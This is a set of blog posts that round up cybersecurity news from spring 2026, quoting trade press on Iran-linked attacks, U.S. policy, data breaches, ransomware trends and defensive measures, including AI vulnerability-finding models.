Cybersecurity Saturday

Cybersecurity

Cybersecurity Saturday

David ErmerCybersecurity, Generative AI

From the Iranian War front,

  • Dark Reading reports,
    • With the US and Iran having reached a fragile ceasefire this week, security researchers and executives are left wondering whether there will be a commensurate pause in the cyberwarfare that has ramped up around the war.
    • The day after the temporary truce was announced, Iran’s most high-profile false-flag hacktivist operation, Handala, offered that it would participate in a temporary pause in hostilities. But even if one takes that group at its word, history suggests that ceasefires rarely stop or slow cyberactivity surrounding kinetic wars. In fact, in the absence of more effective ways of fighting, cyberattacks tend to flare significantly.
    • “Historical data and recent intelligence analysis indicate that a military ceasefire rarely equates to a ‘digital stand-down,'” warns Austin Warnick, director of Flashpoint’s National Security Intelligence Team. Instead, he tells Dark Reading, “Cyber operations often remain steady or even flare up as an asymmetric pressure valve while kinetic hostilities are paused.”
  • Cyberscoop adds,
    • “The fallout and potential exposure from Iran’s state-backed targeting of U.S. critical infrastructure extends to more than 5,200 internet-connected devices, researchers at Censys said in a threat intelligence brief Wednesday [April 8]. 
    • “Of the programmable logic controllers manufactured by Rockwell Automation/Allen-Bradley that Censys identified as potentially exposed to Iranian government attackers, nearly 3,900, or about 3 out of every 4, are based in the United States. 
    • “The cybersecurity firm identified the devices based on details multiple federal agencies shared in a joint alert Tuesday, and published additional indicators of compromise, including operator IPs and other threat hunting queries.
    • “Federal authorities earlier this week warned that Iranian government attackers have exploited devices that control industrial automation processes and disrupted multiple sectors during the past month. Some victims also experienced financial losses as a result of the attacks, officials said.” 
  • MedTech Dive tells us,
    • “Stryker is now fully operational after a[n Iranian] cyberattack took down its manufacturing, ordering and shipping operations.
    • “The medtech company’s global manufacturing and commercial, ordering and distribution systems have been fully restored, according to a Thursday [April 9] filing with the Securities and Exchange Commission.
    • “Stryker said that the attack had a material impact on its operations, which will affect the company’s financial results for the first quarter of 2026. However, Stryker does not expect a material impact on its full-year guidance of 8% to 9.5% organic sales growth and adjusted earnings per share of $14.90 to $15.10.
    • “The company did not detail the expected financial impact on the first quarter.”

From the cybersecurity policy and law enforcement front,

  • The Wall Street Journal reports,
    • “Top White House officials are racing to address potential cybersecurity threats posed by the latest artificial-intelligence models, highlighting how AI’s perils are becoming a top priority for the Trump administration.
    • National Cyber Director Sean Cairncross is leading the administration’s response, convening officials across agencies to identify security weaknesses in critical infrastructure and bolster government systems that could be exploited by AI, people familiar with the matter said. The administration is working with the private sector to make sure Americans are safe when new models are released, White House officials said.
    • “In recent days, the administration has held discussions featuring Vice President JD Vance and Treasury Secretary Scott Bessent with leading tech and financial executives about coordinating the private sector’s response to potential cyberattacks and preparing online systems, the people said. 
    • “The moves come during an intensifying race among the top AI companies to release more powerful models that could cause widespread online disruptions if put to work by bad actors. 
    • Anthropic said this week its new AI model Mythos was so good at finding and exploiting software bugs that the company has no plans to release it to the general public. Instead, Anthropic has made a preview version of the model available to roughly 50 companies and organizations that run critical infrastructure, including leading tech companies such as AppleAmazon.com and Google. The aim is to find and fix bugs in hardware and software before the model is publicly released. 
    • ​​”The company has also held discussions with government officials about the model’s cyber capabilities. 
    • “OpenAI and other model developers are also expected to release powerful tools in the weeks ahead.” 
  • and
    • “Over the past six months, cybersecurity researchers have become increasingly worried that AI systems are not only becoming better at finding bugs, but that they are also shrinking the window of time between when a bug is disclosed and when it can be exploited with working attack software.
    • “Late last year, researchers at Stanford University found that AI software was almost as good as humans at finding and exploiting bugs on a real-world network. 
    • “And earlier this year Anthropic’s Claude Opus 4.6 model found more high-severity bugs in the Firefox browser in two weeks than the rest of the world typically reports in two months. 
    • When measuring dollar cost to find a bug, Mythos is about 10 times as efficient as previous AI models, Graham said.  Details of Mythos’s capabilities were previously reported by Fortune.”
  • HIPAA Journal lets us know,
    • “To help HIPAA-regulated entities manage risks and vulnerabilities, OCR has recorded a risk management video. In the video, Nicholas Heesters, OCR’s Senior Advisor for Cybersecurity, explains the HIPAA risk management requirements and provides examples of potential risk management violations identified during OCR’s investigations of data breaches.
    • “In December 2025, OCR requested questions from HIPAA-regulated entities on risk management,and has provided answers to a selection of those questions in the video. The video also shares important resources to help HIPAA-regulated entities comply with this important HIPAA Security Rule requirement. You can view the video on OCR’s YouTube channel.”
  • Cybersecurity Dive relates,
    • “The Justice Department on Tuesday [April 7] announced that it had stopped Russia’s military intelligence agency from using hacked U.S. routers to maliciously redirect internet traffic and steal data from victims that include governments and critical infrastructure operators.
    • “Operatives of the Russian GRU have spent several years breaking into TP-Link small office and home office (SOHO) routers around the world and reconfiguring them to send DNS requests through Kremlin-controlled servers, which allowed Moscow to collect internet traffic and even passwords, emails and other sensitive information from victim networks. In response, the FBI launched “Operation Masquerade,” sending commands to hacked routers that collected forensic data and reset their DNS settings to erase Russia’s foothold in the devices.
    • DOJ announced the operation hours after Microsoft revealed Russia’s abuse of SOHO routers. “For nation-state actors like Forest Blizzard,” Microsoft said, “DNS hijacking enables persistent, passive visibility and reconnaissance at scale.”

From the cybersecurity breaches and vulnerabilities front,

  • Bleeping Computer reports,
    • “Bitcoin Depot, which operates one of the largest Bitcoin ATM networks, says attackers stole $3.665 million worth of Bitcoin from its crypto wallets after breaching its systems last month.
    • “The company manages more than 25,000 Bitcoin ATMs and BDCheckout locations worldwide and reported revenue of $615 million in 2025.
    • “As revealed in a filing with the U.S. Securities and Exchange Commission, the company discovered the attack on March 23 after detecting suspicious activity on some of its IT systems.”
    • “While it took immediate measures to contain the breach, the attackers had time to steal credentials to digital asset settlement accounts and transfer over 50 Bitcoin from Bitcoin Depot’s wallets before their access was blocked.”
  • Dark Reading discusses how “Russia’s ‘Fancy Bear’ APT Continues Its Global Onslaught.”
    • “Victims don’t need to match the cyber espionage group’s technical sophistication, experts say. But patching and some form of zero trust are now non-negotiable.”
  • The Cybersecurity and Infrastructure Security Agency added two known exploited vulnerabilities to its catalog this week.
  • Bleeping Computer advises,
    • “Analysis of CISA’s Known Exploited Vulnerabilities over the past four years shows critical vulnerabilities still open at Day 7 worsened from 56% to 63% despite teams closing 6.5x more tickets. Staffing cannot solve this.
    • “Of the 52 tracked weaponized vulnerabilities in our study, 88% were patched more slowly than they were exploited — half were weaponized before any patch existed.
    • “The problem is not speed. It is the operational model itself.
    • “Cumulative exposure, not CVE counts, is the true risk metric that security teams now need to measure. While dashboards reward the sprint to get patches implemented, breaches exploit the tail. AI is not another attack surface — instead, the transition period where AI-powered attackers face human defenders is the industry’s most dangerous window.
    • “In response, defenders have to implement their own autonomous, closed-loop risk operations.”
  • and tells us,
    • “Attackers have been exploiting a zero-day vulnerability in Adobe Reader using maliciously crafted PDF documents since at least December.
    • “The attacks have been discovered by security researcher Haifei Li (the founder of the sandbox-based exploit-detection platform EXPMON), who warned on Tuesday that the attackers are using what he described as a “highly sophisticated, fingerprinting-style PDF exploit” to target an undisclosed Adobe Reader security flaw.
    • “Li also said that these attacks have been targeting Adobe users for at least 4 months, stealing data from compromised systems using privileged util.readFileIntoStream and RSS.addFeed Acrobat APIs, and deploying additional exploits.
    • “This ‘fingerprinting’ exploit has been confirmed to leverage a zero-day/unpatched vulnerability that works on the latest version of Adobe Reader without requiring any user interaction beyond opening a PDF file,” Li warned.
    • “Even more concerning, this exploit allows the threat actor to not only collect/steal local information but also potentially launch subsequent RCE/SBX attacks, which could lead to full control of the victim’s system.”
  • Cybersecurity Dive informs us,
    • “A cyber threat actor is using the React2Shell vulnerability as the basis for a widespread credential-harvesting campaign that has compromised everything from AI tool API keys to cloud platform passwords.
    • “After identifying internet-facing React Server Components instances that are vulnerable to React2Shell, the hackers upload a malicious payload to the server — without the need for authentication — that lets them execute arbitrary code on the target server, researchers at Cisco’s Talos threat intelligence group said in a recent report.
    • “The payload contains a “multi-phase credential harvesting tool that harvests credentials, SSH keys, cloud tokens, and environment secrets at scale,” Cisco researchers wrote.
    • “The entire process after target identification is automated. “No further manual interaction is required to extract and exfiltrate credentials harvested from the system,” Cisco said.”

From the ransomware front,

  • The American Hospital Association reports,
    • “Health care and public health was the top sector targeted for cyberthreats in 2025, according to the FBI’s latest annual report on internet crimes. There were 460 ransomware attacks and 182 data breaches, totaling 642 cyber events. Financial services was the next highest sector at 447 total events. 
    • “This report quantifies what we already knew anecdotally about the health care sector being the most targeted by ransomware attacks,” said John Riggi, AHA national advisor for cybersecurity and risk. “The vast majority are perpetrated by foreign ransomware gangs, primarily Russian-speaking groups, which specifically target health care hoping for a big payout. They know these attacks cause disruptions and delays to digitally dependent health care delivery, posing a risk to patient and community safety, thereby increasing the exigency and pressure for a potentially large ransom payment. These despicable acts are in fact threat-to-life crimes and remind us to do what we can on defense and prepare for clinical continuity not if, but when, an attack strikes.” 
  • Dark Reading relates,
    • “Storm-1175 actors are running up-tempo campaigns to deliver Medusa ransomware, putting pressure on organizations to patch critical vulnerabilities faster. 
    • “In a blog post on Monday, Microsoft Threat Intelligence detailed how Storm-1175, a financially motivated cybercrime group, is conducting “high velocity ransomware campaigns” that typically exploit known vulnerabilities in the sweet spot for threat actors: the time between a vulnerability’s initial disclosure and the widespread adoption of the patch. Microsoft also tied the exploitation of several zero-day vulnerabilities to the group.”
    • “Storm-1175’s playbook appears to be predicated on speed. Attackers move quickly from vulnerability exploitation to data exfiltration and, finally, delivery of Medusa ransomware, “often within a few days and, in some cases, within 24 hours,” according to Microsoft.
    • “The threat actor’s high operational tempo and proficiency in identifying exposed perimeter assets have proven successful, with recent intrusions heavily impacting healthcare organizations, as well as those in the education, professional services, and finance sectors in Australia, United Kingdom, and United States,” the blog post stated.”
  • SC Media informs us,
    • “In March, more than a dozen CISOs and other security managers gathered online to discuss how best to handle ransomware in today’s AI-powered environments.
    • “Because the CyberRisk Collaborative roundtable discussion, sponsored by Akamai, followed the Chatham House rule, we can’t tell you who said what. But the latest CRC report, “Redefining Ransomware Containment,” summarizes what was said.
    • “The group’s main message: Ransomware is no longer just a cybersecurity issue, but a full-scale business-resilience challenge.
    • “Organizations should focus on ransomware recovery, the participants agreed. While rapid containment remains critical, stopping an attack is only part of the solution. True success against ransomware includes maintaining business operations, minimizing disruption, and lining up technical response with organizational priorities.
    • “Containment speed is important, but even a quickly halted attack can lead to substantial financial loss or reputational damage. Organizations must take a view of incident success that includes recovery timelines and customer impact alongside traditional security metrics. That’s because a ransomware incident affects the entire enterprise, not just IT systems.
    • “Because business continuity is the true benchmark of resilience, CISOs and other security managers in the roundtable discussion stressed that customers and stakeholders often care less about how quickly an attack is contained and more about whether services remain available.
    • “The CISOs said that as a result, leading organizations are folding ransomware response into broader business-continuity and disaster-recovery plans. That way, critical operations can keep going even during an active incident, and downstream impacts on customers, partners, and markets will be lessened.”

From the cybersecurity defenses front,

  • The Wall Street Journal reports,
    • “Artificial intelligence giant Anthropic unveiled a partnership with cybersecurity companies Tuesday [April 7] that raises more questions about how parts of the security industry may be disrupted by the emerging technology.
    • The company said its new Project Glasswing initiative allows select companies access to its Claude Mythos2 Preview frontier model, specifically for defensive cybersecurity work. Participants include CrowdStrikePalo Alto Networks, Microsoft, Apple, Amazon’s AWS cloud business, JPMorgan Chase, Google, Broadcom, Nvidia and the Linux Foundation.
    • Anthropic said its new model already has found thousands of high-severity vulnerabilities, including some in every major operating system and web browser.
    • “AI models have reached a level of coding capability where they can surpass all but the most skilled humans at finding and exploiting software vulnerabilities,” Anthropic said of Project Glasswing.
    • “The project shows how AI is beginning to reshape parts of the cybersecurity industry, with investors trying to anticipate which areas are built to last and which are ripe to be disrupted by automation. Cyber shares rose as some investors were encouraged by the companies’ inclusion in the Anthropic project, but uncertainty remains about how AI’s impact on the industry will play out.”
  • Forrester identifies ten consequences of Project Glasswing nobody’s writing about yet.
  • SC Media offers five ways to mitigate the risks of “cracked” software.
    • “The human element remains one of the top threat vectors within organizations. Well-intentioned employees trying to get their work done quickly and efficiently can sometimes unknowingly introduce new security risks in doing so.
    • “For instance, an employee needs a PDF editor or design tool, but can’t find an IT-approved option or doesn’t want to wait for access. So they download a free or “cracked” version from the web. It feels harmless. In reality, it creates a direct path into the organization’s IT environment.” * * *
    • “Security teams can reduce this risk, but it takes a shift in focus from policy to control. Taking the following five steps won’t eliminate shadow IT, but they will make it much harder for a quick download to turn into a serious incident:
      • Block unauthorized executables at runtime: Stop unknown binaries from running, even if a user downloads them manually.
      • Restrict local admin rights: Limit who can install or modify software so a single download can’t change the system.
      • Apply a zero-trust approach to application control:  Allow only approved applications to run, block everything else.
      • Use advanced endpoint protection to monitor for behavioral indicators, not just signatures:Look for patterns like manual installs, archive extraction, and unusual execution paths.
      • Reinforce acceptable use policies and user awareness: Make expectations clear and explain the risks.”
  • Here’s a link to Dark Reading’s CISO Corner.

Cybersecurity Saturday

David ErmerCybersecurity, Generative AI

From the Iranian war front,

  • Industrial Cyber reports,
    • “New data from KELA recognizes that Iranian state-sponsored threat actors have moved well beyond traditional espionage, increasingly blurring the line between nation-state operations and financially motivated cybercrime. Rather than running large-scale ransomware cartels of their own, these groups have embedded themselves into the existing criminal ecosystem, acting as initial access brokers, collaborating with ransomware affiliates, and deploying pseudo-ransomware to mask destructive attacks as extortion campaigns.
    • “A key example is Pay2Key, an Iran-linked ransomware operation that has resurfaced as a professionalized RaaS platform operating on the anonymous I2P network, actively recruiting affiliates from Russian cybercrime forums and offering an elevated profit share, bumping the affiliate cut from 70% to 80%, for attacks on U.S. and Israeli targets. The model creates a significant compliance risk for victim organizations: paying what appears to be a routine ransom demand could unknowingly funnel money to OFAC-sanctioned Iranian entities, exposing companies to severe legal and financial penalties.
    • “The KELA Cyber Intelligence Center identified in its Monday [March 30] post that one of the more concerning developments is the growing collaboration between Iranian state-linked actors and the broader ransomware ecosystem.”
  • Security Week relates,
    • The FBI has confirmed that threat actors have gained access to an email account belonging to FBI Director Kash Patel, but said no government information has been compromised. 
    • “The Iran-linked hacker group Handala on Friday [March 27] claimed to have hacked Patel’s email account, releasing files allegedly representing photos, emails, and classified documents taken from the FBI director’s inbox.
    • “The so-called ‘impenetrable’ systems of the FBI were brought to their knees within hours by our team,” the hackers wrote. 
    • However, the account does not appear to be hosted on FBI systems; it is a personal Gmail account. In addition, the stolen information does not seem to be recent.
    • It’s unclear when the account was hacked, but it may have been one of the many targeted by Iranian hackers back in 2024 as part of an operation targeting Donald Trump’s presidential campaign.” 
  • Cyberscoop tells us,
    • “Medtech company Stryker says it’s back to being “fully operational,” three weeks after it became the most prominent victim to date of Iranian hackers, who said they attacked the Michigan-based company in retaliation over the conflict with the United States and Israel.
    • “A March 11 wiper attack from the pro-Palestinian, Iranian government-connected group Handala damaged the company’s order processing, manufacturing and shipping.” * * *
    • “Production is moving rapidly toward peak capacity with discipline and stability, supported by restored commercial, ordering and distribution systems,” the company wrote in an update on its website Wednesday. “Overall product supply remains healthy, with strong availability across most product lines, as we continue to meet customer demand and support patient care.”
    • “Stryker said it continues to work with outside cyber experts, government agencies and industry partners on its investigation and recovery.” * * *
    • “Iranian hackers have been busy since the U.S.-Israel strikes began, but have claimed few successes in the United States. Handala boasted this week about an attack on St. Joseph County, Indiana, where officials said they were investigating a hack of its external fax service.”

From the cybersecurity policy front,

  • Cybersecurity Dive reports,
    • “President Donald Trump on Friday [April 3] proposed significantly slashing the Cybersecurity and Infrastructure Security Agency’s budget.
    • The White House’s fiscal year 2027 budget would reduce CISA’s funding by $707 million, roughly 30% of its FY2025 budget of $2.4 billion.
    • “The administration said its proposal “refocuses CISA on its core mission” of protecting federal networks and helping critical infrastructure operators defend themselves from cyberattacks and physical threats.”
  • Per a March 31 HHS news release,
    • “The U.S. Department of Health and Human Services (HHS) today announced that it is reversing a 2024 reorganization that: (1) dually titled the Office of the National Coordinator for Health Information Technology (ONC) as the Office of the Assistant Secretary for Technology Policy/Office of the National Coordinator for Health IT (ASTP/ONC), headed by the Assistant Secretary for Technology Policy, dually titled as the National Coordinator for Health IT; (2) moved three HHS-wide technology roles to ONC from the Office of the Chief Information Officer (OCIO); and (3) shifted specific cybersecurity functions out of OCIO.
    • “Today’s action restores a unified, Department‑wide technology leadership model by returning these enterprise responsibilities to OCIO while sharpening ONC’s mission focus on nationwide health IT interoperability and data liquidity.
    • “Under this alignment, HHS has ended the Biden administration’s dual management title for the Assistant Secretary for Technology Policy, restored ONC as a singularly titled office, and shifted the roles, responsibilities, and offices of the HHS Chief Technology Officer (CTO), HHS Chief Artificial Intelligence Officer (CAIO), and HHS Chief Data Officer (CDO) back under the HHS Chief Information Officer’s leadership. This structure reinforces OCIO’s statutory responsibility for enterprise IT, cybersecurity, and data operations, while enabling ONC to concentrate on health IT policy, standards, and certification that support better care and lower costs.
    • “To better integrate policy and operations, OCIO will organize enterprise roles around three core functions: (1) strategic technology leadership and innovation, led by the CTO; (2) responsible, trustworthy artificial intelligence, led by the CAIO; and (3) enterprise data governance and analytics, led by the CDO. These leaders will work as a unified team under the CIO to deliver secure, scalable platforms and common services that support ONC’s policy work and the Department’s mission programs.
    • “This structure allows OCIO to provide an integrated backbone for cloud, cybersecurity, data, and AI that every HHS component can rely on,” said HHS Chief Information Officer Clark Minor. “By bringing CTO, CAIO, and CDO functions together under one roof, we can move faster on shared platforms, protect our systems more effectively, and support ONC and the operating divisions with the technology capabilities they need to innovate for patients.”
  • Cybersecurity Dive informs us,
    • “Federal government leaders are prioritizing cybersecurity improvements as they sketch out their technology-modernization agendas for the year, consulting firm EY said in a survey released this week.
    • “Roughly half of survey respondents (56%) said cybersecurity was one of their top modernization priorities, with roughly a third saying that growing cybersecurity threats “are a barrier for their agencies to achieve their modernization goals,” the survey found.
    • “EY also presented data on government leaders’ impressions of their agencies’ current security postures and their hopes for AI.”
  • Bleeping Computer points out,
    • “The U.S. Federal Bureau of Investigation (FBI) warned Americans against using foreign-developed mobile applications, particularly those created by Chinese developers.
    • “In a public service announcement (PSA) issued via its Internet Crime Complaint Center (IC3) platform this Tuesday [March 31], the FBI warned of privacy and data security risks associated with these apps.
    • “As of early 2026, many of the most downloaded and top-grossing apps in the United States are developed and maintained by foreign companies, particularly those based in China,” the bureau warned.”

From the cybersecurity breaches and vulnerabilities front,

  • Health Exec reports on April 2,
    • “A hospital in Texas revealed that it’s fallen victim to a data breach that exposed the personal information of more than 257,000 patients to hackers.
    • “Nacogdoches Memorial Hospital—an independent health system in Texas consisting of one emergency-capable facility, several affiliated provider practices, and a rehabilitation center—made the breach public this week.
    • “The incident occurred on Jan. 31—or at least, that’s when Nacogdoches Memorial staff became aware of an ongoing cyberattack.
    • “At that time, the hospital said it notified law enforcement, initiated an “incident response plan” and began an investigation to find out what happened. As for details such as the nature of the breach and who was responsible, neither a statement from Nacogdoches Memorial nor a report filed with the Office of the Maine Attorney General contain those details.
    • “To date, no known listing of the data trove on the dark web exists, and no hacker group has claimed responsibility for the cyberattack. Whether or not the data will eventually end up leaked onto the Internet or put up for sale remains unknown—but given the scope of the breach and the black market value of the stolen information, it’s not out of the realm of possibility.”
  • Bleeping Computer relates,
    • “Telehealth giant Hims & Hers Health is warning that it suffered a data breach after support tickets were stolen from a third-party customer service platform.” * * *
    • “It is one of the most successful U.S. brands in the online pharmacy and telehealth space, with strong marketing presence, and annual revenues close to $1 billion.” * * *
    • “BleepingComputer learned last month that the ShinyHunters extortion gang conducted the breach.
    • “The data was stolen as part of a widespread campaign in which threat actors compromised Okta SSO accounts to gain access to third-party cloud storage services and SaaS platforms to steal data.
    • “In this particular attack, BleepingComputer was told that the threat actors used the Okta SSO account to access the His and Hers Zendesk instance, where they stole millions of support tickets.”
  • Dark Reading notes,
    • “The impact of TeamPCP’s high-profile supply chain attacks is rapidly expanding — in more ways than one.
    • “Following last month’s spree of compromised open source projects, two victim organizations disclosed breaches related to the attacks this week. On Tuesday, AI startup Mercor said on social media platform X that it was “one of thousands of companies impacted by a supply chain attack involving LiteLLM.”
    • “And on Thursday, the EU’s Computer Emergency Response Team (CERT-EU) disclosed that a recent attack on the European Commission’s cloud and Web infrastructure stemmed from the previously reported Trivy supply chain attack,also attributed to TeamPCP. According to CERT-EU, the EC inadvertently installed a compromised version of the Trivy code-scanning security tool, which allowed threat actors to harvest credentials and secrets that they later used to access the organization’s Amazon Web Services (AWS) cloud environment.”
  • The American Hospital Association News tells us,
    • “The Cybersecurity and Infrastructure Security Agency released an alert March 27 on a vulnerability in F5 BIG-IP Access Policy Manager software that is being exploited for malicious cyber activity. F5 devices and software, used widely by health care and other critical infrastructure, provide app security and management services. The vulnerability was previously disclosed in October 2025 as a denial-of-service issue but was reclassified this month due to new information that found the vulnerability allows malicious actors to perform remote code execution, according to an alert from F5. 
    • “F5 has determined that this issue is much more severe than previously thought,” said Scott Gee, AHA deputy national advisor for cybersecurity and risk. “The original patch released last year fixes the larger issue, so if you are using F5’s BIG-IP software, a very common app delivery and security service, ensure that you patch the system as soon as possible.” 
       
  • Cybersecurity Dive informs us,
    • “Security researchers warn that chaining two critical vulnerabilities in Progress Software’s ShareFile service could allow an attacker to achieve remote code execution.
    • “The flaws exist in ShareFile Storage Zones Controller, which helps users manage files while they are using the ShareFile software-as-a-service interface, according to researchers at watchTowr Labs.
    • “The vulnerabilities include an authentication bypass flaw, tracked as CVE-2026-2699, and a remote code execution flaw, CVE-2026-2701. The vulnerabilities have severity scores of 9.8 and 9.1, respectively.
    • “Progress Software warned in a security bulletin released Thursday [April 2] that an attacker could access on-premises Storage Zones Controller configuration pages, allowing them to make changes in system configuration or achieve remote code execution.
    • “There is no immediate evidence of exploitation, but researchers urged users to immediately apply security updates.”
  • and
    • “A North Korean threat actor is suspected to be behind a major supply chain attack against a
      Axios, a JavaScript library that is downloaded more than 100 million times per week, according to security researchers. 
    • “Earlier this week, an attacker compromised the node package manager account for an axios maintainer and introduced a malicious dependency plain-crypto-js. The malicious versions were deleted within a few hours, but, with the widespread use of axios, there was a risk that a large number of users could have downloaded the poisoned version.
    • “Researchers from Google Threat Intelligence Group said the malicious dependency is an obfuscated dropper that deploys a backdoor called Waveshaper.v2 across Windows, Linux and Mac environments.” 
  • Bleeping Computer notes,
    • “Threat actors are exploiting the recent Claude Code source code leak by using fake GitHub repositories to deliver Vidar information-stealing malware.
    • “Claude Code is a terminal-based AI agent from Anthropic, designed to execute coding tasks directly in the terminal and act as an autonomous agent, capable of direct system interaction, LLM API call handling, MCP integration, and persistent memory.
    • “On March 31, Anthropic accidentally exposed the full client-side source code of the new tool via a 59.8 MB JavaScript source map included by accident in the published npm package.”
  • and
    • “Device code phishing attacks that abuse the OAuth 2.0 Device Authorization Grant flow to hijack accounts have surged more than 37 times this year.
    • “In this type of attack, the threat actor sends a device authorization request to a service provider and receives a code, which is sent to the victim under various pretexts.
    • “Next, the victim is tricked into entering the code on the legitimate login page, thus authorizing the attacker’s device to access the account through valid access and refresh tokens.
  • Per Cyberscoop,
    • “A new malware-based credential-stealing campaign, which researchers are calling “DeepLoad,” has been infecting enterprise business IT environments.
    • “In a report released Monday, ReliaQuest AI researchers Thassanai McCabe and Andrew Currie say the most relevant feature of this attack is the way it uses artificial intelligence and other engineering “to defeat the controls most organizations rely on, turning one user action into persistent, credential-stealing access.”
    • “DeepLoad is delivered to victims via “QuickFix” social-engineering techniques, such as fake browser prompts or error pages. If the user falls for the scheme, the malware developers — or more likely their AI tools — put a lot of work into building evasion of security technology “at every stage” of the attack chain.
    • “The loader “buries functional code under thousands of meaningless variable assignments,” and the payload runs behind a Windows lock screen process that is “overlooked by security tools” monitoring for threats. ReliaQuest said “the sheer volume” of code padding likely rules out human-only involvement.”
  • Info Security discusses,
    • “A new malware-as-a-service (MaaS) platform dubbed Venom Stealer that automates credential theft and continuous data exfiltration has been identified by cybersecurity researchers.
    • “The platform is being sold on cybercrime networks and is designed to go beyond traditional credential harvesting tools by maintaining ongoing access to stolen data even after the initial infection.”

From the ransomware front,

  • Cisco Talos reflects on ransomware trends in 2025.
  • Cyberscoop reports,
    • “The Akira ransomware group has compromised hundreds of victims over the past year with a well-honed attack lifecycle that has whittled down the time from initial access to encryption of data in less than four hours, according tocybersecurity firm Halcyon.”
  • Security Week relates,
    • “Like an inverted pyramid, the range of different attack modes are now built on top of the single point of identity abuse.
    • “Stolen credentials are a major threat. Legitimate credentials illegitimately acquired provide legitimate access to illegitimate actors. Once inside the network, these bad actors have greater ability to move and act in stealth. The continuing rise in ransomware attacks bears testament.
    • “The theft and resale of credentials operates on an industrial scale. Fueled by the rise of increasingly more sophisticated infostealers, stolen credentials are packaged into ‘logs’ and sold to criminals on the black market. Ontinue reports, “Listings tied to LummaC2 alone surged by 72%, with high-privilege cloud console credentials selling for $1,000–$15,000+.”
    • “Ransomware has been one of the primary beneficiaries of stolen credentials. More than 7,000 incidents and 129 active groups were tracked through 2025. At the same time, ransom payments decreased slightly from $892M in 2024 to $820M in 2025. This apparent contradiction is actually logical.
    • “Larger targets, with larger payout potential, will have seen the most aggressive corporate investment (process and technology) mitigating exposure to this attack pattern,” explains Trey Ford, chief strategy and trust officer at Bugcrowd. These larger targets are also more susceptible to government pressure to not pay ransoms, and ransomware income has consequently declined. The ransomware groups have responded with more attacks demanding smaller payments from more but smaller companies.” 

From the cybersecurity defenses front,

  • Dark Reading reports,
    • “After some delay, Apple has patched the vulnerabilities associated with the DarkSword exploit chain for all affected customers, even those who aren’t updated to iOS 26 — a boon for organizations trying to get users updated to a new version all at once, and for those with patch management policies that preclude such updates.”
  • and
    • “Joseph Izzo, chief medical information officer for San Joaquin General Hospital, received ransomware training during a downtime period. He practiced responding and maintaining patient care in the event that the facility is forced to operate offline. But when the hospital where he was working was actually hit with ransomware, he realized very quickly how “different it was under pressure.” 
    • “Izzo shared his story at RSAC 2026 Conference and provided key incident response (IR) recommendations for healthcare organizations, a sector frequently targeted by ransomware gangs due to highly sensitive information. Ransomware doesn’t always cripple hospitals, but partial attacks happen frequently, Izzo explained. Either way, a rapid response is necessary when serving a vulnerable population.
    • “Recommendations ranged from identity protection to being prepared to operate with pen and paper in a digital world. Preparation is what really “makes the difference” when healthcare facilities are trying to get past a ransomware incident, Izzo emphasized.” 
  • Cybersecurity Dive tells us,
    • “Cybersecurity is one of the leading risks influencing corporate executives’ decisions about AI adoption, the consulting firm KPMG said in a quarterly AI pulse survey released on Tuesday.
    • “Three-quarters of senior leaders at large corporations told KPMG that they were worried about the cybersecurity and privacy risk associated with AI tools, according to the report.
    • “The survey also asked questions about governance approaches and agentic AI, offering a window into how businesses around the world are wrestling with new security challenges.”
  • Here is a link to Dark Reading’s CISO Corner.

Cybersecurity Dive

David ErmerCybersecurity, Generative AI

From the Iranian war front,

  • Industrial Cyber reports,
    • “Following its recent cybersecurity incident, medical technology giant Stryker said it found no indication of ransomware or malware. As the investigation progressed, alongside Palo Alto Networks’ Unit 42 and other experts, the company determined that the threat actor used a malicious file to execute commands, enabling them to conceal activity within its systems. The file was not capable of spreading, either within or outside the environment.
    • “Our internal teams continue to work around the clock with external partners to make meaningful progress on our restoration efforts. We are grateful for the partnership and collaboration with government agencies and industry partners,” Stryker wrote in its latest update. “We believe the incident is contained, and we are prioritizing restoration of systems that directly support customers, ordering and shipping. Our internal teams, in partnership with third-party experts, reacted quickly to not only regain access but to remove the unauthorized party from our environment.”
    • “The update noted that, most importantly, the investigation has not identified any malicious activity directed towards customers, suppliers, vendors, or partners.” * * *
    • “Resecurity warns that the Iran conflict has rapidly evolved into a multi-domain confrontation where kinetic military operations are tightly integrated with cyber, electronic, and information warfare, marking a shift in how modern conflicts unfold. The analysis highlights sustained missile and drone strikes occurring alongside coordinated cyber campaigns driven by state-linked actors and proxy groups targeting critical infrastructure, enterprises, and government systems. This convergence is expected to persist, with cyber operations increasingly used to disrupt services, gather intelligence, and amplify geopolitical impact, even as physical hostilities continue across the region.”
  • MedTech Dive adds,
    • “Stryker has restored most manufacturing sites and critical lines roughly two weeks after the company suffered a cyberattack.
    • “The company is working with its global manufacturing sites as “operations steadily improve towards full capacity,” a spokesperson said in a statement emailed to MedTech Dive. Stryker is making “strong progress” on restoring underlying systems that support production and fulfillment.
    • “Stryker’s electronic ordering system, which was shut down due to the attack, has been restored for customers. The Portage, Michigan-based company is “working as quickly and safely as possible to reconcile orders, manufacture products and deliver to our customers so they can continue to provide seamless patient care,” the spokesperson said.
    • “The spokesperson declined to comment on whether Stryker has a timeline for full restoration of its operations, and whether the financial and material impact on the company is yet known.”
  • Cybersecurity Dive relates,
    • “An Iran-linked ransomware group targeted an unnamed U.S. healthcare provider in the lead-up to the Iran war, according to a report Tuesday [March 24] from Halcyon
    • “Tracked under the name Pay2Key, the group gained access to a compromised administrative account for several days and then encrypted the account. 
    • “Forensics investigators, which included Halcyon and Beazley Security, found no evidence that data was stolen. This marks a departure from the group’s previous attacks. Researchers suggest the attacker may have changed tactics to focus more on destruction rather than pure extortion. 
    • “Also, the threat group appears to have shifted its attention toward the U.S. after historically targeting Israeli systems.” 

From the cybersecurity policy and law enforcement front,

  • Cybersecurity Dive reports,
    • “Members of Congress and their staffs are eagerly awaiting the Trump administration’s plan for implementing its new cybersecurity strategy and want more regular updates on how the government is helping critical infrastructure organizations guard against new Iran-linked hacking threats.
    • “Staffers from the House Homeland Security Committee and the House Oversight Committee discussed those and other cybersecurity issues during a panel at the RSAC 2026 Conference here on Tuesday [March 24].
    • “While the Democratic and Republican staffers sometimes took different approaches to the issues, they agreed on the need for more details about the strategy and about efforts to counter Iran-linked cyberattacks.”
  • and
    • “The program that underpins the entire global vulnerability-fixing ecosystem is in danger of either collapsing or fading into irrelevance without major changes, according to one of the program’s leaders.
    • “I don’t think we can afford to continue at the pace [and] with the tools that we currently have in order to make real progress. We’re just gonna be left in the dust,” Katie Noble, a board member for the Common Vulnerabilities and Exposures (CVE) Program, said during a panel at the RSAC 2026 Conference here on Tuesday [March 24].” * * *
